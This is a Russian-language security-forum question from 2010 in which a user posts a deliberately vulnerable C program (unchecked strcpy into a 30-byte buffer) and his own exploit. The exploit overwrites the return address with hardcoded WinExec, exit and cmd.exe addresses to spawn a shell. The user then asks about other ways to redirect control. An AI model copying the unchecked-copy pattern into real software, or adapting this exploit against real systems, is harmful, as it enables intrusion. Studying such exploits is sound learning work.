ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование > С/С++, C#, Delphi, .NET, Asm
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Buffer Overflow на примере
  #1  
Старый 28.04.2010, 21:53
kRa$I-I
Познающий
Регистрация: 23.01.2009
Сообщений: 32
Провел на форуме:
96906

Репутация: 8
По умолчанию Buffer Overflow на примере

Добрый вечер!
Помогите разобраться с переполнением буфера. Я много статей находил на разных форумах, но остались некоторые вопросы.
Есть следующий кусок кода:
Код:
#include <stdio.h>
#include <windows.h> 

int main(int argc, char* argv[])
{

char buf[30]; // Переполняемый буфер  
strcpy(buf,argv[1]);
printf("argv = %s\n\n", buf); 

return 0; 

}
Написал следующий exploit:
Код:
#include <stdio.h>
#include <windows.h>

int main()
{
// 0x6FFAB16F  //----->WinExec(); 0x77E6E695    0x775FE695
// 0x6FF636AA  //----->exit();    0x6E37B9D0     0x77BC64F4   
// 0x770F03B0  //----->cmd.exe    0x7762F814


char exec[1000]="vuln1.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAFFFF\x95\xE6\x5F\x77\xF4\x64\xBC\x77\x14\xF8\x62\x77";

system(exec);

return 0;
}
Идея была проста затереть адрес возврата адресом WinExec. Дизассемблировав Kernel32 нашел базовый адрес этой ф-ии (1 в комменте), а вот олька показала что при загрузки dll в память адреса слегка отличаются, ну да черт с ними. Эксплоит заработал, но до ближайшей перезагрузки, потом адреса опять сменились.


Вопрос какие техники передачи управления на свой код существуют и актуальны (желательно на примере)?

ВСЕМ ЗАРЕНЕЕ ОГРОМНОЕ СПАСИБО

Последний раз редактировалось kRa$I-I; 28.04.2010 в 23:53..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
buffer overflow aka PSIH Windows 8 28.04.2009 23:17
Метасплоит Framework v. 3.0 (описание) -=lebed=- Статьи 10 24.02.2007 02:05
Microsoft Visual C++ 6.0 SP6 resource compiler buffer overflow _Great_ Реверсинг 0 25.01.2007 11:30
NVidia Binary Graphics Driver For Linux Buffer Overflow Exploit Goudini Защита ОС: вирусы, антивирусы, файрволы. 0 18.10.2006 14:13
Microsoft Internet Explorer MHTML URI Buffer Overflow Vulnerability NeMiNeM Forum for discussion of ANTICHAT 1 08.06.2006 17:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ